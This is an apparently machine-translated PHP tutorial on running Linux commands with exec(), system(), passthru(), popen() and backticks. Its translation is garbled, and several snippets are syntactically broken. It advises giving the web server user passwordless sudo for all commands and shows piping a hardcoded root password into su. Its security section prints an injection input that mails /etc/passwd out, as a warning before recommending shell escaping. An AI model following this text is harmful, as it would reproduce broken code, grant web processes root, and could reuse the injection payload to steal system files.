Go to PHP in the exec, system and other functions call the Linux command problem

Linux command issues called by Exec, system, and other functions in PHP

First novel two sentences: Today, the next PHP call the function of the Linux command, the beginning of how to do the call is unsuccessful, tried for a long time to finally succeed, so send to share. Below I will describe in detail:

PHP provides several functions called Linux commands, exec, system, PASSTHRU, function use please refer to the manual, not specifically described here. Here I take the EXEC function as an example: for example, the Modify server Time command in Linux is/bin/date-s ' 2010-05-28 13:10 ', we use the PHP function exec call this command to execute the modified time exec ("Sudo/bin/date- S ' 2010-05-28 13:10 ' ", $out, $status), where $out is the output value, $status is the return value 0 or 1, if 0 is executed successfully, and 1 returns execution failure. To successfully execute this command through PHP (PHP running user non-root) needs to check the following points: 1, first check the PHP running user, can be viewed in the Web server configuration file, or run <?php echo shell_exec ("id-a"); > View directly. For example, my running user is www, edit/etc/sudoers file vi/etc/sudoers first add www user www all= (all) Nopasswd:all This means that the WWW user does not need to enter a password when running.      Then see the picture comment off the front two, delete the environment variable ls_colors, which is not in Ubuntu, this step can be omitted, other Redhat, Fedora, CentOS These are the need to do so. 2, check whether the php.ini in the configuration to open the Safe mode, mainly the following three places Safe_mode = (this if two of the off under the tube)
Disable_functions =
Safe_mode_exec_dir= over, you can use Exec to invoke the Linux command execution.

PHP Execution System external Command systems () EXEC () PassThru ()

PHP as a server-side scripting language, like writing simple, or complex dynamic Web pages such a task, it is fully capable. But this is not always the case, sometimes in order to achieve a function, you have to rely on the operating system external programs (or called commands), so you can do more with less.
Difference:
System () outputs and returns the last line of the shell results.
EXEC () does not output results, returns the last line of the shell result, and all results can be saved to a returned array.
PassThru () only invokes the command and outputs the result of the command directly to the standard output device.
Same point: All can get status code of command execution
Demo
Copy the code code as follows:

System (' dir ');
exec (' dir ');
PassThru (' dir ');
Echo ' dir ';

PHP as a server-side scripting language, like writing simple, or complex dynamic Web pages such a task, it is fully capable. But this is not always the case, sometimes in order to achieve a function, you have to rely on the operating system external programs (or called commands), so you can do more with less.
So, is it possible to invoke external commands in a PHP script? If so, how do you do it? What are some of the concerns? I'm sure you will be able to answer these questions after reading this article.
Is it possible?
The answer is yes. PHP, like other programming languages, can invoke external commands entirely within a program, and is simple: just use one or several functions.
Pre-conditions
Because PHP is basically used for Web program development, security has become an important aspect of people's thinking. So PHP's designers have added a door to PHP: Safe mode. If you are running in Safe mode, then the PHP script will be subject to the following four limitations:
Execute external command
There are some limitations when opening a file
Connect to MySQL Database
HTTP-based Authentication
In safe mode, only external programs in a particular directory can be executed, and calls to other programs will be rejected. This directory can be specified in the php.ini file with the Safe_mode_exec_dir directive, or in the compiler PHP is added--with-exec-dir option, the default is/usr/local/php/bin.
If you call an external command that you should be able to output (meaning that there is no error in the PHP script), the result is a blank space, so it is likely that your network administrator has already run PHP in safe mode.
How to do?
Calling external commands in PHP can be implemented in three ways:
1) Special functions provided by PHP
PHP provides a total of 3 specialized functions for executing external commands: System (), exec (), PassThru ().
System ()
Prototype: string system (String command [, int return_var])
The system () function is similar in other languages, it executes the given command, outputting and returning the result. The second parameter is optional and is used to get the status code after the command executes.
Example:
Copy the code code as follows:

<?php
System ("/usr/local/bin/webalizer/webalizer");
?>

EXEC ()
Prototype: string exec (String command [, string array [, int return_var]])
The exec () function, like system (), also executes the given command, but does not output the result, but instead returns the last line of the result. Although it returns only the last line of the command result, the second parameter array gives the complete result by appending the result line to the end of the array. So if the array is not empty, it is best to clear it with unset () before calling it. The third parameter can be used to obtain the status code of the command execution only if the second parameter is specified.
Example:
Copy the code code as follows:

<?php
EXEC ("/bin/ls-l");
EXEC ("/bin/ls-l", $res);
EXEC ("/bin/ls-l", $res, $RC);
?>

PassThru ()
Prototype: void PassThru (String command [, int return_var])
PassThru () only invokes the command, does not return any results, but outputs the result of the command directly to the standard output device. So the PassThru () function is often used to invoke programs such as Pbmplus (a tool for processing pictures under Unix, a stream of output binary raw images). It can also get the status code of the command execution.
Example:
Copy the code code as follows:

<?php
Header ("Content-type:image/gif");
PassThru ("./ppmtogif hunte.ppm");
?>

2) Open the process with the Popen () function
The above method can only execute commands simply, but cannot interact with the command. But sometimes you have to enter something into the command, such as when adding Linux system users, to call Su to change the current user to root, and the SU command must enter the root password on the command line. In this case, it is obviously not possible to use the method mentioned above.
The Popen () function opens a process pipeline to execute the given command, returning a file handle. Now that you have returned a file handle, you can read and write to it. In PHP3, the handle can only be done in a single mode of operation, either written or read, and starting from PHP4, you can read and write at the same time. Unless the handle is opened in a pattern (read or write), you must call the Pclose () function to close it.
Example 1:
Copy the code code as follows:

<?php
$FP =popen ("/bin/ls-l", "R");
?>

Example 2:
Copy the code code as follows:

<?php
/* How to add a system user in PHP
Here is a routine that adds a user named James,
The root password is verygood. For reference only
*/
$sucommand = "Su--login root--command";
$useradd = "Useradd";
$ROOTPASSWD = "Verygood";
$user = "James";
$user _add = sprintf ("%s"%s "%s", $sucommand, $useradd, $user);
$fp = @popen ($user _add, "w");
@fputs ($fp, $ROOTPASSWD);
@pclose ($FP);
?>

3) Use the anti-apostrophe (', that is, the one below the ESC key on the keyboard, and ~ on the same top)
This method was not previously included in the PHP document, as a trick to exist. The method is simple, use two anti-apostrophes to enclose the command to be executed as an expression, and the value of the expression is the result of the command execution. Such as:
Copy the code code as follows:

<?php
$res = '/bin/ls-l ';
Echo '
'. $res. '
‘;
?>

The output of this script is like this:
Hunte.gif
hunte.ppm
Jpg.htm
Jpg.jpg
passthru.php
What to think about?
There are two issues to consider: security and timeouts.
Look at security first. For example, you have a small online store, so the list of products you can sell is placed in a file. You write an HTML file with a form, let your users enter their email address, and then send the product list to them. Assuming you're not using PHP's Mail () function (or you've never heard of it), you're going to call the Linux/unix system's mail program to send the file. The program is like this:
Copy the code code as follows:

<?php
System ("Mail $to < products.txt");
echo "Our catalogue has been sent to your mailbox: $to";
?>

With this code, there is no danger to the average user, but there is actually a very big security hole. If a malicious user enters such an email address:
'--bla; mail [email protected] </etc/passwd; '
Then this command eventually becomes:
' Mail--bla; mail [email protected] </etc/passwd; < Products.txt '
I believe that no matter which network manager sees such an order, it will scare out a cold sweat.
Fortunately, PHP provides us with two functions: Escapeshellcmd () and Escapeshellarg (). The Escapeshellcmd function escapes all characters in a string that may be hidden from the shell and execute another command. These characters have special meanings in the shell, like semicolons (), redirects (>), and reads from files (<). The function escapeshellarg is used to handle the arguments of the command. It adds single quotes around the given string and escapes the single quotes in the string so that the string can be safely used as a parameter to the command.
Take a look at the timeout problem. If the command to be executed takes a long time, then the command should be placed in the background of the system to run. However, by default, functions like system () wait until the command finishes running before returning (in effect, waiting for the output of the command), which will definitely cause the PHP script to time out. The workaround is to redirect the output of the command to another file or stream, such as:
Copy the code code as follows:

<?php
System ("/usr/local/bin/order_proc >/tmp/null &");
?>

Go to PHP in the exec, system and other functions call the Linux command problem